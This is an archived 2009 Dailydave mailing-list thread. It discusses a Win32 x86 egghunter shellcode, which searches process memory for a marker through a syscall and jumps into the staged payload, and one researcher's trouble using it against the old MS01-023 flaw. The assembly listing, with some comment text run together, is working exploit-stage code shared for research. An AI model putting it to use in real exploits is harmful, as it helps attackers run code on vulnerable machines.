Dailydave mailing list archives
Re: Merry Xmas & Happy "Search Memory for you Shellcode"...
From: Berend-Jan Wever <berendjanwever () gmail com>
Date: Wed, 23 Dec 2009 20:51:56 +0100
Not sure this helps (I must admit I only scanned your email) but you could try this: http://skypher.com/wiki/index.php/Hacking/Shellcode/Egg_hunt/w32_SEH_omelet_shellcode Berend-Jan Wever <berendjanwever () gmail com> http://skypher.com/SkyLined On Wed, Dec 23, 2009 at 3:36 PM, Nelson Brito <nbrito () sekure org> wrote:
What if? inc_page: and dx, 0FFFFF000h ; add PAGE_SIZE-1 to edx inc_byte: dec edx ; decrement our pointer by one Have anyone tested this yet??? /* * $Id: .siganture,v 1.3 2009-12-11 09:22:54-02 nbrito Exp $ * * Author: Nelson Brito <nbrito [at] sekure [dot] org> Copyright(c) 2004-2009 Nelson Brito. All rights reserved worldwide. http://fnstenv.blogspot.com */-----Original Message----- From: Nelson Brito [mailto:nbrito () sekure org] Sent: Wednesday, December 23, 2009 12:16 PM To: 'dailydave () lists immunityinc com' Subject: Merry Xmas & Happy "Search Memory for you Shellcode"... Hey, fellows. I am get some spare time to work with a well-known technique called "egghunt", based on skape excellent article "Safely Searching Process Virtual Address Space" (http://www.hick.org/code/skape/papers/egghunt- shellcode.pdf). But while trying to perform this technique on a really old vulnerability (MS01-023) the egghunt doesn't work as good as I was expecting. The code: win32_syscall_forward_01 PROC start: xor edx, edx ; zeroing the edx,it isnecessary to avoid BO in 'Release' inc_page: or dx, 0FFFh ; add PAGE_SIZE-1to edxinc_byte: inc edx ; increment ourpointer by onesetup_syscall: push edx ; save edx on thestackpush +02h ; pushNtAccessCheckAndAuditAlarmpop eax ; pop into eax int 2Eh ; perform thesyscall(KiSystemService()) cmp al, 05h ; did we get 0xc0000005 (STATUS_ACCESS_VIOLATION)? pop edx ; restore edx je inc_page ; yes, invalidpointer, go to thenext page setup_badge: mov eax, "NBNB" ; throw our badgein eaxcheck_badge: mov edi, edx ; set edi to thepointer wevalidated scasd ; compare the dwordin edi to eaxjnz inc_byte ; no match?increment the pointerby one scasd ; compare the dwordin edi to eaxagain - which is now eax + 3 jnz inc_byte ; no match?increment the pointerby one badge_found: jmp edi ; found the badge,jump 8 bytespast it into our code win32_syscall_forward_01 ENDP Well, I called this "forward" because it will try to find the code from "the place" BO happens to the end of STACK. Am I right? But in this vulnerability the stager shellcode will be placed insomewhereon the BUTTOM of the STACK, right? /* * $Id: .siganture,v 1.3 2009-12-11 09:22:54-02 nbrito Exp $ * * Author: Nelson Brito <nbrito [at] sekure [dot] org> Copyright(c) 2004-2009 Nelson Brito. All rights reserved worldwide. http://fnstenv.blogspot.com */_______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
_______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- Re: Merry Xmas & Happy "Search Memory for you Shellcode"... Nelson Brito (Dec 23)
- Re: Merry Xmas & Happy "Search Memory for you Shellcode"... Berend-Jan Wever (Dec 23)